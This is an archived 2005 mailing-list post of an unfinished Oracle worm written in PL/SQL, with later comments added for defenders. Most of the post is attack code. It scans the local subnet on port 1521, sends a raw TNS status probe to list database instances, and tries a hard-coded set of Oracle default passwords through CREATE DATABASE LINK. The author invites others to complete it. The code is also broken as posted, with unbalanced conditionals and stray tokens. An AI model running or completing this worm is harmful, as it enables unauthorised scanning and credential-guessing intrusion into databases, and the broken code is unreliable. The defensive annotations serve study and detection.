Trick or treat Larry
From: <oracleworm () hushmail com>
Date: Mon, 31 Oct 2005 14:12:29 -0800

Voyager Beta worm - not complete - maybe someone else has time to 
look at it


-- Archived proof-of-concept (posted as the "Voyager" Oracle worm, 2005), kept here for
-- analysis.  What a defender should recognise in it:
--   * an anonymous PL/SQL block using UTL_INADDR and UTL_TCP to reach out from the
--     database server to neighbouring hosts on port 1521,
--   * a hand-built TNS packet carrying the listener STATUS command, whose reply is
--     scraped for (INSTANCE_NAME=...) entries,
--   * CREATE DATABASE LINK statements issued through DBMS_SQL with a short list of
--     Oracle default account credentials.
-- Detection / mitigation angles: audit CREATE DATABASE LINK and DBMS_SQL use from
-- non-application sessions, restrict EXECUTE on UTL_TCP / UTL_INADDR, and lock or
-- re-password the default accounts listed below.
-- NOTE(review): as posted the block does not appear to compile (the IF/ELSE IF chain
-- is not balanced and lines around `dbms_sql.open_cursor () xxx` carry stray tokens);
-- this is consistent with the author's "not complete" remark.
set serveroutput on
set verify off

DECLARE

-- i1 / i2 are declared but never referenced in the body.
i1 INTEGER;
i2 INTEGER;

-- Last octet of the address currently being probed; counts down from 220 (see main loop).
iHostToSearchFor INTEGER;

-- Own IP address, its first three octets, and a scratch character used while parsing it.
current_ipaddress VARCHAR2(100);
current_network VARCHAR2(100);
current_letter VARCHAR2(1);

-- TCP connection handle and an index that walks the IP string backwards.
c   UTL_TCP.CONNECTION;
ln integer;

-- Byte count returned by the first READ_RAW.
vLen NUMBER;

-- Last SID attempted; used to skip repeated instance names in the same reply.
PreviousSID varchar2(100);

-- vRequest: the outgoing TNS packet.  vResp: accumulated reply.  vRespPiece: the
-- first decoded slice of it.  vRespTemp is unused.  ret_val receives WRITE_RAW's result.
vRequest varchar2(500);
vResp varchar2(32767);
vRespPiece varchar2(200);
vRespTemp varchar2(200);
ret_val pls_integer;

BEGIN

-- Resolve the address of the host this block runs on; the scan is confined to its /24.
current_ipaddress := utl_inaddr.get_host_address;
ln := length(current_ipaddress);

-- Walk the address from the right until the last '.' is found (or the string is exhausted).
loop
 current_letter := substr(current_ipaddress, ln, 1);
        ln := ln - 1;
        
        EXIT WHEN current_letter = '.';
        EXIT WHEN ln = 0;
end loop;

-- Everything before the last '.', i.e. the first three octets.
current_network := substr(current_ipaddress, 1, ln);

dbms_output.put_line( 'network to search: ' || current_network );
dbms_output.put_line( 'starting: ' || to_char(sysdate, 'MI:SS') );

-- Probe starts at .220 and walks downwards (decrement and exit are at the loop bottom).
iHostToSearchFor := 220;

-- Raw TNS connect-style packet; the only readable part is the trailing
-- (CONNECT_DATA=(COMMAND=status)) listener control command.  The meaning of the
-- leading header bytes is not documented here -- presumably length/version fields.
vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) || 
chr(0) || chr(0) || chr(0) || 
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || 
chr(8) || chr(0) || 
chr(127) || chr(255) || chr(127) || chr(8) || chr(0) || chr(0) || 
chr(0) || chr(1) || 
chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || 
chr(0) || chr(0) || 
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) 
|| chr(0) || 
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(230) || 
chr(0) || chr(0) || 
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) 
|| chr(0) || 
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))'; 

-- Main scan loop: one host per iteration.
loop
 begin
   vResp := ''; 
   PreviousSID := '';

        -- Connect to <network>.<octet>:1521; a closed port raises NETWORK_ERROR,
        -- handled at the bottom of this block.
        c  := UTL_TCP.OPEN_CONNECTION(current_network || '.' || 
iHostToSearchFor, 1521);
   -- Reached only when the connect succeeded.
   dbms_output.put_line( 'found live port @ ' || to_char(sysdate, 
'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor);
   -- Send the STATUS probe and read the first 100 bytes of the reply.
   ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequest)); 
   vLen := UTL_TCP.READ_RAW(c, vResp, 100 ); 

   -- Keep 58 bytes starting at offset 43 of the first chunk -- presumably skipping a
   -- TNS header; the offsets are not explained in the posting.
   vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 
58)); 
   vResp := vRespPiece;
   
   -- Drain the rest of the reply in 100-byte chunks.  The loop has no EXIT; it ends
   -- only when READ_RAW raises (end of data / connection closed), which the OTHERS
   -- handler swallows.
   declare 
       read_from_network varchar2(32000);
       length_read_from_network INTEGER;
   begin
   
     loop
       read_from_network := ''; 
       length_read_from_network := UTL_TCP.READ_RAW(c, 
read_from_network, 100 ); 
       read_from_network := 
utl_raw.cast_to_varchar2(utl_raw.substr(read_from_network, 1, 
length_read_from_network));
       vResp := vResp || read_from_network;
       
     end loop;
   
     EXCEPTION
       when OTHERS then
         read_from_network := '';                 
   end;

-- look for INSTANCE_NAME= and then for )

--   dbms_output.put_line( substr( vResp, 1, 254) );
--   dbms_output.put_line( substr( vResp, 255, 254) );
--   dbms_output.put_line( substr( vResp, 510, 254) );

         
          UTL_TCP.CLOSE_CONNECTION(c); 

 -- Parse every (INSTANCE_NAME=<sid>) entry out of the listener reply and attempt each one.
 declare 
   i3 INTEGER;
   i4 INTEGER;
   sid varchar2(100);
                cur binary_integer;
                i binary_integer;
                -- Intended replication payload; declared but never assigned (its use is
                -- commented out below), so this posting carries no self-copying code.
                procedure_to_spread varchar2(32000);
   create_link varchar2(500);    
 begin    

   i3 := 1;
   i4 := 1;

   loop
 
     -- i3: start of the next "(INSTANCE_NAME=" occurrence; i4: its closing ')'.
     -- The SID is the text between them (15 = length of "(INSTANCE_NAME=").
     i3 := instr(vResp, '(INSTANCE_NAME=', i3);
     exit when i3 = 0;

     i4 := instr(vResp, ')', i3);
     sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
     dbms_output.put_line( 'Found SID of ' || sid );
     i3 := i3 + 1;

     begin
       -- Skip a SID already tried and the external-procedure pseudo-services.
       if sid = PreviousSID or sid = 'PLSExtProc' or sid = 
'extproc' 
       then
         -- don't do anything
         dbms_output.put_line( 'Not trying the SID: ' || sid );
       else
         dbms_output.put_line( 'Attacking the SID: ' || sid );      
                               

        -- One iteration per credential pair.
        loop          

           declare 
           
            iLoop integer := 0;
            username1 varchar2(100);
            password1 varchar2(100);
            
           begin
           
           iLoop := iLoop + 1; 
           exit when iLoop = 8;
           
           -- The seven pairs below are Oracle default accounts with their shipped
           -- passwords -- exactly the accounts a hardening baseline locks or re-passwords.
           -- NOTE(review): each `else if` opens a nested IF but only one END IF follows.
           if iLoop = 1 then
             username1 := 'system';
             password1 := 'manager';
             
           else if iLoop = 2 then
             username1 := 'sys';
             password1 := 'change_on_install';
           
           else if iLoop = 3 then
             username1 := 'dbsnmp';
             password1 := 'dbsnmp';
           
           else if iLoop = 4 then
             username1 := 'outln';
             password1 := 'outln';
           
           else if iLoop = 5 then
             username1 := 'scott';
             password1 := 'tiger';
           
           else if iLoop = 6 then
             username1 := 'mdsys';
             password1 := 'mdsys';
           
           else if iLoop = 7 then
             username1 := 'ordcommon';
             password1 := 'ordcommon';
           
           end if;
                       
           
                -- Remove any link left over from a previous attempt, via dynamic SQL.
                cur := dbms_sql.open_cursor;
                dbms_sql.parse(cur, 'drop database link xxx', 
dbms_sql.v7);
                i := dbms_sql.execute( cur );
                
                    -- Build the CREATE DATABASE LINK statement by string concatenation,
                    -- embedding the credential pair and the parsed SID (SID here resolves
                    -- to the local variable `sid`; PL/SQL identifiers are case-insensitive).
                    -- A successful execute is what a defender would see in DDL auditing.
                    create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' || 
username1 || ' IDENTIFIED BY ' || password1 || ' USING 
''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS = (PROTOCOL = TCP)(HOST = ' 
|| iHostToSearchFor || ')(PORT = 
1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=' || SID || 
')))';
                
                dbms_sql.parse(cur, create_link, dbms_sql.v7);
                i := dbms_sql.execute( cur );
                dbms_sql.close_cursor(cur);

                      -- NOTE(review): the `() xxx` tokens on the following lines are not
                      -- valid PL/SQL; this stretch cannot have run as posted.
                      cur := dbms_sql.open_cursor () xxx;
--                      dbms_sql.parse () xxx(cur, procedure_to_spread, 
dbms_sql.v7);
--                      i := dbms_sql.execute () xxx( cur );
                dbms_sql.parse () xxx(cur, 'drop table x', dbms_sql.v7);
                i := dbms_sql.execute () xxx( cur );
                dbms_sql.parse () xxx(cur, 'CREATE TABLE X (Y DATE)' , 
dbms_sql.v7);
                i := dbms_sql.execute () xxx( cur );
                dbms_sql.close_cursor () xxx(cur);
                
                -- Any failure for this credential pair is swallowed and the next one is tried.
                exception
                  when others then
              DBMS_OUTPUT.PUT_LINE('failed creating a database link 
that worked '); 
                
                end if;
                
         end loop;
         
       end if;
       
       PreviousSID := SID;

     end;
           
   end loop;

 end;
          
 -- Raised by OPEN_CONNECTION when nothing listens on 1521 at this address;
 -- the scan simply moves to the next host.
 EXCEPTION
   when utl_tcp.NETWORK_ERROR then
       DBMS_OUTPUT.PUT_LINE('nothing found @ ' || to_char(sysdate, 
'MI:SS') || ' - ' || current_network || '.' || iHostToSearchFor); 
        end;
         
        -- Next host downwards; stops after .217 (216 is never probed).
        iHostToSearchFor := iHostToSearchFor - 1;
        EXIT WHEN iHostToSearchFor = 216;
end loop;

dbms_output.put_line( 'finished the loop @ ' || to_char(sysdate, 
'MI:SS') );

END;
/





Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

